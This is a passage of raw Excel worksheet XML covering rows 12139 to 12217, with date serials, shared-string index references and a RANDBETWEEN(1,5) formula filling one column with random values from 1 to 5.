      </c>
      <c r="E12139" t="s">
        <v>10392</v>
      </c>
      <c r="F12139">
        <f t="shared" ca="1" si="189"/>
        <v>4</v>
      </c>
    </row>
    <row r="12140" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12140" s="1">
        <v>43306.616956018515</v>
      </c>
      <c r="C12140" t="s">
        <v>10</v>
      </c>
      <c r="D12140" t="s">
        <v>80</v>
      </c>
      <c r="E12140" t="s">
        <v>10877</v>
      </c>
      <c r="F12140">
        <f t="shared" ca="1" si="189"/>
        <v>1</v>
      </c>
    </row>
    <row r="12141" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12141" s="1">
        <v>43306.612407407411</v>
      </c>
      <c r="C12141" t="s">
        <v>10</v>
      </c>
      <c r="D12141" t="s">
        <v>667</v>
      </c>
      <c r="E12141" s="2" t="s">
        <v>10878</v>
      </c>
      <c r="F12141">
        <f t="shared" ca="1" si="189"/>
        <v>5</v>
      </c>
    </row>
    <row r="12142" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12142" s="1">
        <v>43306.611979166664</v>
      </c>
      <c r="C12142" t="s">
        <v>1068</v>
      </c>
      <c r="D12142" t="s">
        <v>817</v>
      </c>
      <c r="E12142" t="s">
        <v>9877</v>
      </c>
      <c r="F12142">
        <f t="shared" ca="1" si="189"/>
        <v>3</v>
      </c>
    </row>
    <row r="12143" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12143" s="1">
        <v>43306.608055555553</v>
      </c>
      <c r="C12143" t="s">
        <v>10</v>
      </c>
      <c r="D12143" t="s">
        <v>6</v>
      </c>
      <c r="E12143" s="2" t="s">
        <v>10879</v>
      </c>
      <c r="F12143">
        <f t="shared" ca="1" si="189"/>
        <v>4</v>
      </c>
    </row>
    <row r="12144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12144" s="1">
        <v>43306.606307870374</v>
      </c>
      <c r="C12144" t="s">
        <v>993</v>
      </c>
      <c r="D12144" t="s">
        <v>232</v>
      </c>
      <c r="E12144" t="s">
        <v>9877</v>
      </c>
      <c r="F12144">
        <f t="shared" ca="1" si="189"/>
        <v>2</v>
      </c>
    </row>
    <row r="12145" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12145" s="1">
        <v>43306.605798611112</v>
      </c>
      <c r="C12145" t="s">
        <v>10</v>
      </c>
      <c r="D12145" t="s">
        <v>163</v>
      </c>
      <c r="E12145" s="2" t="s">
        <v>10880</v>
      </c>
      <c r="F12145">
        <f t="shared" ca="1" si="189"/>
        <v>2</v>
      </c>
    </row>
    <row r="12146" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12146" s="1">
        <v>43306.603796296295</v>
      </c>
      <c r="C12146" t="s">
        <v>10</v>
      </c>
      <c r="D12146" t="s">
        <v>112</v>
      </c>
      <c r="E12146" t="s">
        <v>10881</v>
      </c>
      <c r="F12146">
        <f t="shared" ca="1" si="189"/>
        <v>2</v>
      </c>
    </row>
    <row r="12147" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12147" s="1">
        <v>43306.596724537034</v>
      </c>
      <c r="C12147" t="s">
        <v>841</v>
      </c>
      <c r="D12147" t="s">
        <v>263</v>
      </c>
      <c r="E12147" t="s">
        <v>9877</v>
      </c>
      <c r="F12147">
        <f t="shared" ca="1" si="189"/>
        <v>1</v>
      </c>
    </row>
    <row r="12148" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12148" s="1">
        <v>43306.592048611114</v>
      </c>
      <c r="C12148" t="s">
        <v>328</v>
      </c>
      <c r="D12148" t="s">
        <v>11</v>
      </c>
      <c r="E12148" t="s">
        <v>9877</v>
      </c>
      <c r="F12148">
        <f t="shared" ca="1" si="189"/>
        <v>3</v>
      </c>
    </row>
    <row r="12149" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12149" s="1">
        <v>43306.586770833332</v>
      </c>
      <c r="C12149" t="s">
        <v>10</v>
      </c>
      <c r="D12149" t="s">
        <v>151</v>
      </c>
      <c r="E12149" t="s">
        <v>10882</v>
      </c>
      <c r="F12149">
        <f t="shared" ca="1" si="189"/>
        <v>5</v>
      </c>
    </row>
    <row r="12150" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12150" s="1">
        <v>43306.579432870371</v>
      </c>
      <c r="C12150" t="s">
        <v>10</v>
      </c>
      <c r="D12150" t="s">
        <v>89</v>
      </c>
      <c r="E12150" t="s">
        <v>10883</v>
      </c>
      <c r="F12150">
        <f t="shared" ca="1" si="189"/>
        <v>4</v>
      </c>
    </row>
    <row r="12151" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12151" s="1">
        <v>43306.567164351851</v>
      </c>
      <c r="C12151" t="s">
        <v>17</v>
      </c>
      <c r="D12151" t="s">
        <v>1993</v>
      </c>
      <c r="E12151" s="2" t="s">
        <v>10756</v>
      </c>
      <c r="F12151">
        <f t="shared" ca="1" si="189"/>
        <v>5</v>
      </c>
    </row>
    <row r="12152" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12152" s="1">
        <v>43306.538090277776</v>
      </c>
      <c r="C12152" t="s">
        <v>10</v>
      </c>
      <c r="D12152" t="s">
        <v>20</v>
      </c>
      <c r="E12152" s="2" t="s">
        <v>10884</v>
      </c>
      <c r="F12152">
        <f t="shared" ca="1" si="189"/>
        <v>5</v>
      </c>
    </row>
    <row r="12153" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12153" s="1">
        <v>43306.536944444444</v>
      </c>
      <c r="C12153" t="s">
        <v>17</v>
      </c>
      <c r="D12153" t="s">
        <v>632</v>
      </c>
      <c r="E12153" s="2" t="s">
        <v>10756</v>
      </c>
      <c r="F12153">
        <f t="shared" ca="1" si="189"/>
        <v>3</v>
      </c>
    </row>
    <row r="12154" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12154" s="1">
        <v>43306.519930555558</v>
      </c>
      <c r="C12154" t="s">
        <v>48</v>
      </c>
      <c r="E12154" s="2" t="s">
        <v>10885</v>
      </c>
      <c r="F12154">
        <f t="shared" ca="1" si="189"/>
        <v>2</v>
      </c>
    </row>
    <row r="12155" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12155" s="1">
        <v>43306.496157407404</v>
      </c>
      <c r="C12155" t="s">
        <v>10</v>
      </c>
      <c r="D12155" t="s">
        <v>6</v>
      </c>
      <c r="E12155" t="s">
        <v>10886</v>
      </c>
      <c r="F12155">
        <f t="shared" ca="1" si="189"/>
        <v>3</v>
      </c>
    </row>
    <row r="12156" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12156" s="1">
        <v>43306.483368055553</v>
      </c>
      <c r="C12156" t="s">
        <v>314</v>
      </c>
      <c r="E12156" t="s">
        <v>10887</v>
      </c>
      <c r="F12156">
        <f t="shared" ca="1" si="189"/>
        <v>3</v>
      </c>
    </row>
    <row r="12157" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A12157" s="1">
        <v>43306.443657407406</v>
      </c>
      <c r="C12157" t="s">
        <v>139</v>
      </c>
      <c r="D12157" t="s">
        <v>251</v>
      </c>
      <c r="E12157" s="2" t="s">
        <v>10888</v>
      </c>
      <c r="F12157">
        <f t="shared" ca="1" si="189"/>
        <v>2</v>
      </c>
    </row>
    <row r="12158" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12158" s="1">
        <v>43306.440266203703</v>
      </c>
      <c r="C12158" t="s">
        <v>151</v>
      </c>
      <c r="D12158" t="s">
        <v>23</v>
      </c>
      <c r="E12158" s="2" t="s">
        <v>10889</v>
      </c>
      <c r="F12158">
        <f t="shared" ca="1" si="189"/>
        <v>1</v>
      </c>
    </row>
    <row r="12159" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A12159" s="1">
        <v>43306.428749999999</v>
      </c>
      <c r="C12159" t="s">
        <v>156</v>
      </c>
      <c r="D12159" t="s">
        <v>1056</v>
      </c>
      <c r="E12159" s="2" t="s">
        <v>10890</v>
      </c>
      <c r="F12159">
        <f t="shared" ca="1" si="189"/>
        <v>5</v>
      </c>
    </row>
    <row r="12160" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12160" s="1">
        <v>43306.404907407406</v>
      </c>
      <c r="C12160" t="s">
        <v>10</v>
      </c>
      <c r="D12160" t="s">
        <v>52</v>
      </c>
      <c r="E12160" s="2" t="s">
        <v>10891</v>
      </c>
      <c r="F12160">
        <f t="shared" ca="1" si="189"/>
        <v>5</v>
      </c>
    </row>
    <row r="12161" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12161" s="1">
        <v>43306.344270833331</v>
      </c>
      <c r="C12161" t="s">
        <v>48</v>
      </c>
      <c r="E12161" t="s">
        <v>10892</v>
      </c>
      <c r="F12161">
        <f t="shared" ca="1" si="189"/>
        <v>1</v>
      </c>
    </row>
    <row r="12162" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A12162" s="1">
        <v>43306.321099537039</v>
      </c>
      <c r="C12162" t="s">
        <v>10</v>
      </c>
      <c r="D12162" t="s">
        <v>713</v>
      </c>
      <c r="E12162" s="2" t="s">
        <v>5776</v>
      </c>
      <c r="F12162">
        <f t="shared" ref="F12162:F12225" ca="1" si="190">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="12163" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12163" s="1">
        <v>43306.320451388892</v>
      </c>
      <c r="C12163" t="s">
        <v>10</v>
      </c>
      <c r="D12163" t="s">
        <v>17</v>
      </c>
      <c r="E12163" t="s">
        <v>10893</v>
      </c>
      <c r="F12163">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12164" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12164" s="1">
        <v>43306.290613425925</v>
      </c>
      <c r="C12164" t="s">
        <v>173</v>
      </c>
      <c r="E12164" t="s">
        <v>10894</v>
      </c>
      <c r="F12164">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12165" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A12165" s="1">
        <v>43306.287928240738</v>
      </c>
      <c r="C12165" t="s">
        <v>10</v>
      </c>
      <c r="D12165" t="s">
        <v>6</v>
      </c>
      <c r="E12165" s="2" t="s">
        <v>10895</v>
      </c>
      <c r="F12165">
        <f t="shared" ca="1" si="190"/>
        <v>1</v>
      </c>
    </row>
    <row r="12166" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12166" s="1">
        <v>43306.262928240743</v>
      </c>
      <c r="C12166" t="s">
        <v>48</v>
      </c>
      <c r="E12166" t="s">
        <v>10896</v>
      </c>
      <c r="F12166">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12167" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A12167" s="1">
        <v>43306.216099537036</v>
      </c>
      <c r="C12167" t="s">
        <v>71</v>
      </c>
      <c r="E12167" s="2" t="s">
        <v>10897</v>
      </c>
      <c r="F12167">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12168" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12168" s="1">
        <v>43306.177766203706</v>
      </c>
      <c r="C12168" t="s">
        <v>124</v>
      </c>
      <c r="E12168" t="s">
        <v>10898</v>
      </c>
      <c r="F12168">
        <f t="shared" ca="1" si="190"/>
        <v>4</v>
      </c>
    </row>
    <row r="12169" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12169" s="1">
        <v>43306.165381944447</v>
      </c>
      <c r="C12169" t="s">
        <v>841</v>
      </c>
      <c r="D12169" t="s">
        <v>94</v>
      </c>
      <c r="E12169" s="2" t="s">
        <v>10899</v>
      </c>
      <c r="F12169">
        <f t="shared" ca="1" si="190"/>
        <v>1</v>
      </c>
    </row>
    <row r="12170" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12170" s="1">
        <v>43306.165219907409</v>
      </c>
      <c r="C12170" t="s">
        <v>318</v>
      </c>
      <c r="F12170">
        <f t="shared" ca="1" si="190"/>
        <v>1</v>
      </c>
    </row>
    <row r="12171" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12171" s="1">
        <v>43306.155972222223</v>
      </c>
      <c r="C12171" t="s">
        <v>139</v>
      </c>
      <c r="E12171" s="2" t="s">
        <v>10900</v>
      </c>
      <c r="F12171">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12172" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12172" s="1">
        <v>43306.147847222222</v>
      </c>
      <c r="C12172" t="s">
        <v>41</v>
      </c>
      <c r="E12172" t="s">
        <v>10901</v>
      </c>
      <c r="F12172">
        <f t="shared" ca="1" si="190"/>
        <v>1</v>
      </c>
    </row>
    <row r="12173" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12173" s="1">
        <v>43306.131145833337</v>
      </c>
      <c r="C12173" t="s">
        <v>318</v>
      </c>
      <c r="E12173" t="s">
        <v>10902</v>
      </c>
      <c r="F12173">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12174" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12174" s="1">
        <v>43306.116608796299</v>
      </c>
      <c r="C12174" t="s">
        <v>71</v>
      </c>
      <c r="E12174" s="2" t="s">
        <v>10903</v>
      </c>
      <c r="F12174">
        <f t="shared" ca="1" si="190"/>
        <v>4</v>
      </c>
    </row>
    <row r="12175" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12175" s="1">
        <v>43306.070787037039</v>
      </c>
      <c r="C12175" t="s">
        <v>41</v>
      </c>
      <c r="E12175" s="2" t="s">
        <v>10904</v>
      </c>
      <c r="F12175">
        <f t="shared" ca="1" si="190"/>
        <v>1</v>
      </c>
    </row>
    <row r="12176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12176" s="1">
        <v>43306.068310185183</v>
      </c>
      <c r="C12176" t="s">
        <v>140</v>
      </c>
      <c r="D12176" t="s">
        <v>141</v>
      </c>
      <c r="E12176" t="s">
        <v>10905</v>
      </c>
      <c r="F12176">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12177" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12177" s="1">
        <v>43306.050706018519</v>
      </c>
      <c r="C12177" t="s">
        <v>318</v>
      </c>
      <c r="F12177">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12178" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12178" s="1">
        <v>43306.013229166667</v>
      </c>
      <c r="C12178" t="s">
        <v>6</v>
      </c>
      <c r="D12178" t="s">
        <v>114</v>
      </c>
      <c r="E12178" s="2" t="s">
        <v>10906</v>
      </c>
      <c r="F12178">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12179" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A12179" s="1">
        <v>43306.001134259262</v>
      </c>
      <c r="C12179" t="s">
        <v>10</v>
      </c>
      <c r="D12179" t="s">
        <v>6</v>
      </c>
      <c r="E12179" s="2" t="s">
        <v>10907</v>
      </c>
      <c r="F12179">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12180" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12180" s="1">
        <v>43305.899606481478</v>
      </c>
      <c r="C12180" t="s">
        <v>3106</v>
      </c>
      <c r="D12180" t="s">
        <v>494</v>
      </c>
      <c r="E12180" t="s">
        <v>10908</v>
      </c>
      <c r="F12180">
        <f t="shared" ca="1" si="190"/>
        <v>4</v>
      </c>
    </row>
    <row r="12181" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12181" s="1">
        <v>43305.884687500002</v>
      </c>
      <c r="C12181" t="s">
        <v>10</v>
      </c>
      <c r="D12181" t="s">
        <v>52</v>
      </c>
      <c r="E12181" t="s">
        <v>10909</v>
      </c>
      <c r="F12181">
        <f t="shared" ca="1" si="190"/>
        <v>1</v>
      </c>
    </row>
    <row r="12182" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12182" s="1">
        <v>43305.876504629632</v>
      </c>
      <c r="C12182" t="s">
        <v>408</v>
      </c>
      <c r="E12182" s="2" t="s">
        <v>10910</v>
      </c>
      <c r="F12182">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12183" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12183" s="1">
        <v>43305.859293981484</v>
      </c>
      <c r="C12183" t="s">
        <v>139</v>
      </c>
      <c r="E12183" t="s">
        <v>10911</v>
      </c>
      <c r="F12183">
        <f t="shared" ca="1" si="190"/>
        <v>4</v>
      </c>
    </row>
    <row r="12184" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12184" s="1">
        <v>43305.84584490741</v>
      </c>
      <c r="C12184" t="s">
        <v>10</v>
      </c>
      <c r="D12184" t="s">
        <v>11</v>
      </c>
      <c r="E12184" t="s">
        <v>10912</v>
      </c>
      <c r="F12184">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12185" s="1">
        <v>43305.838993055557</v>
      </c>
      <c r="C12185" t="s">
        <v>140</v>
      </c>
      <c r="D12185" t="s">
        <v>847</v>
      </c>
      <c r="E12185" t="s">
        <v>10913</v>
      </c>
      <c r="F12185">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12186" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12186" s="1">
        <v>43305.793993055559</v>
      </c>
      <c r="C12186" t="s">
        <v>10</v>
      </c>
      <c r="D12186" t="s">
        <v>494</v>
      </c>
      <c r="E12186" t="s">
        <v>10914</v>
      </c>
      <c r="F12186">
        <f t="shared" ca="1" si="190"/>
        <v>4</v>
      </c>
    </row>
    <row r="12187" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12187" s="1">
        <v>43305.774525462963</v>
      </c>
      <c r="C12187" t="s">
        <v>10</v>
      </c>
      <c r="D12187" t="s">
        <v>11</v>
      </c>
      <c r="E12187" s="2" t="s">
        <v>10915</v>
      </c>
      <c r="F12187">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12188" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12188" s="1">
        <v>43305.763437499998</v>
      </c>
      <c r="C12188" t="s">
        <v>260</v>
      </c>
      <c r="E12188" t="s">
        <v>10916</v>
      </c>
      <c r="F12188">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12189" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12189" s="1">
        <v>43305.76152777778</v>
      </c>
      <c r="C12189" t="s">
        <v>10</v>
      </c>
      <c r="D12189" t="s">
        <v>6</v>
      </c>
      <c r="E12189" t="s">
        <v>10917</v>
      </c>
      <c r="F12189">
        <f t="shared" ca="1" si="190"/>
        <v>4</v>
      </c>
    </row>
    <row r="12190" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12190" s="1">
        <v>43305.637349537035</v>
      </c>
      <c r="C12190" t="s">
        <v>3106</v>
      </c>
      <c r="D12190" t="s">
        <v>94</v>
      </c>
      <c r="E12190" t="s">
        <v>10918</v>
      </c>
      <c r="F12190">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12191" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12191" s="1">
        <v>43305.621712962966</v>
      </c>
      <c r="C12191" t="s">
        <v>6</v>
      </c>
      <c r="D12191" t="s">
        <v>25</v>
      </c>
      <c r="E12191" t="s">
        <v>10919</v>
      </c>
      <c r="F12191">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12192" s="1">
        <v>43305.619409722225</v>
      </c>
      <c r="C12192" t="s">
        <v>10</v>
      </c>
      <c r="D12192" t="s">
        <v>39</v>
      </c>
      <c r="E12192" t="s">
        <v>10920</v>
      </c>
      <c r="F12192">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12193" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12193" s="1">
        <v>43305.576620370368</v>
      </c>
      <c r="C12193" t="s">
        <v>39</v>
      </c>
      <c r="D12193" t="s">
        <v>2214</v>
      </c>
      <c r="F12193">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12194" s="1">
        <v>43305.538472222222</v>
      </c>
      <c r="C12194" t="s">
        <v>10</v>
      </c>
      <c r="D12194" t="s">
        <v>89</v>
      </c>
      <c r="E12194" t="s">
        <v>10921</v>
      </c>
      <c r="F12194">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12195" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A12195" s="1">
        <v>43305.501875000002</v>
      </c>
      <c r="C12195" t="s">
        <v>6</v>
      </c>
      <c r="D12195" t="s">
        <v>194</v>
      </c>
      <c r="E12195" s="2" t="s">
        <v>10922</v>
      </c>
      <c r="F12195">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12196" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A12196" s="1">
        <v>43305.486203703702</v>
      </c>
      <c r="C12196" t="s">
        <v>10</v>
      </c>
      <c r="D12196" t="s">
        <v>163</v>
      </c>
      <c r="E12196" s="2" t="s">
        <v>10923</v>
      </c>
      <c r="F12196">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12197" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12197" s="1">
        <v>43305.46607638889</v>
      </c>
      <c r="C12197" t="s">
        <v>6</v>
      </c>
      <c r="D12197" t="s">
        <v>25</v>
      </c>
      <c r="E12197" t="s">
        <v>10924</v>
      </c>
      <c r="F12197">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12198" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A12198" s="1">
        <v>43305.459351851852</v>
      </c>
      <c r="C12198" t="s">
        <v>10</v>
      </c>
      <c r="D12198" t="s">
        <v>112</v>
      </c>
      <c r="E12198" s="2" t="s">
        <v>10925</v>
      </c>
      <c r="F12198">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12199" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12199" s="1">
        <v>43305.448344907411</v>
      </c>
      <c r="C12199" t="s">
        <v>103</v>
      </c>
      <c r="E12199" t="s">
        <v>10926</v>
      </c>
      <c r="F12199">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12200" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12200" s="1">
        <v>43305.443425925929</v>
      </c>
      <c r="C12200" t="s">
        <v>10</v>
      </c>
      <c r="D12200" t="s">
        <v>112</v>
      </c>
      <c r="E12200" t="s">
        <v>10927</v>
      </c>
      <c r="F12200">
        <f t="shared" ca="1" si="190"/>
        <v>4</v>
      </c>
    </row>
    <row r="12201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12201" s="1">
        <v>43305.438946759263</v>
      </c>
      <c r="C12201" t="s">
        <v>10</v>
      </c>
      <c r="E12201" t="s">
        <v>10928</v>
      </c>
      <c r="F12201">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12202" s="1">
        <v>43305.437372685185</v>
      </c>
      <c r="C12202" t="s">
        <v>48</v>
      </c>
      <c r="E12202" t="s">
        <v>10929</v>
      </c>
      <c r="F12202">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12203" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12203" s="1">
        <v>43305.43178240741</v>
      </c>
      <c r="C12203" t="s">
        <v>10</v>
      </c>
      <c r="D12203" t="s">
        <v>1091</v>
      </c>
      <c r="E12203" s="2" t="s">
        <v>10930</v>
      </c>
      <c r="F12203">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12204" s="1">
        <v>43305.430601851855</v>
      </c>
      <c r="C12204" t="s">
        <v>10</v>
      </c>
      <c r="D12204" t="s">
        <v>336</v>
      </c>
      <c r="E12204" t="s">
        <v>10931</v>
      </c>
      <c r="F12204">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12205" s="1">
        <v>43305.420937499999</v>
      </c>
      <c r="C12205" t="s">
        <v>10</v>
      </c>
      <c r="E12205" t="s">
        <v>10932</v>
      </c>
      <c r="F12205">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12206" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12206" s="1">
        <v>43305.402592592596</v>
      </c>
      <c r="C12206" t="s">
        <v>48</v>
      </c>
      <c r="E12206" t="s">
        <v>10933</v>
      </c>
      <c r="F12206">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12207" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12207" s="1">
        <v>43305.396307870367</v>
      </c>
      <c r="C12207" t="s">
        <v>60</v>
      </c>
      <c r="E12207" t="s">
        <v>10934</v>
      </c>
      <c r="F12207">
        <f t="shared" ca="1" si="190"/>
        <v>4</v>
      </c>
    </row>
    <row r="12208" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12208" s="1">
        <v>43305.391550925924</v>
      </c>
      <c r="C12208" t="s">
        <v>41</v>
      </c>
      <c r="E12208" t="s">
        <v>10935</v>
      </c>
      <c r="F12208">
        <f t="shared" ca="1" si="190"/>
        <v>4</v>
      </c>
    </row>
    <row r="12209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12209" s="1">
        <v>43305.389062499999</v>
      </c>
      <c r="C12209" t="s">
        <v>10</v>
      </c>
      <c r="D12209" t="s">
        <v>89</v>
      </c>
      <c r="E12209" t="s">
        <v>10936</v>
      </c>
      <c r="F12209">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12210" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A12210" s="1">
        <v>43305.350810185184</v>
      </c>
      <c r="C12210" t="s">
        <v>10</v>
      </c>
      <c r="D12210" t="s">
        <v>222</v>
      </c>
      <c r="E12210" s="2" t="s">
        <v>10937</v>
      </c>
      <c r="F12210">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12211" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12211" s="1">
        <v>43305.328668981485</v>
      </c>
      <c r="C12211" t="s">
        <v>178</v>
      </c>
      <c r="E12211" s="2" t="s">
        <v>10938</v>
      </c>
      <c r="F12211">
        <f t="shared" ca="1" si="190"/>
        <v>4</v>
      </c>
    </row>
    <row r="12212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12212" s="1">
        <v>43305.283506944441</v>
      </c>
      <c r="C12212" t="s">
        <v>41</v>
      </c>
      <c r="E12212" t="s">
        <v>10939</v>
      </c>
      <c r="F12212">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12213" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12213" s="1">
        <v>43305.237349537034</v>
      </c>
      <c r="C12213" t="s">
        <v>48</v>
      </c>
      <c r="E12213" s="2" t="s">
        <v>10940</v>
      </c>
      <c r="F12213">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12214" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12214" s="1">
        <v>43305.23636574074</v>
      </c>
      <c r="C12214" t="s">
        <v>45</v>
      </c>
      <c r="E12214" t="s">
        <v>10941</v>
      </c>
      <c r="F12214">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12215" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12215" s="1">
        <v>43305.207025462965</v>
      </c>
      <c r="C12215" t="s">
        <v>71</v>
      </c>
      <c r="E12215" s="2" t="s">
        <v>10942</v>
      </c>
      <c r="F12215">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12216" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12216" s="1">
        <v>43305.192048611112</v>
      </c>
      <c r="C12216" t="s">
        <v>314</v>
      </c>
      <c r="E12216" t="s">
        <v>10943</v>
      </c>
      <c r="F12216">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12217" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12217" s="1">
        <v>43305.185972222222</v>
      </c>
      <c r="C12217" t="s">
        <v>139</v>
      </c>
      <c r="D12217" t="s">
        <v>312</v>
      </c>
      <c r="E12217" s="2" t="s">
        <v>10944</v>
      </c>
      <c r="F12217">
        <f t="shared" ca="1" si="190"/>
        <v>1</v>
      </c>
    </row>
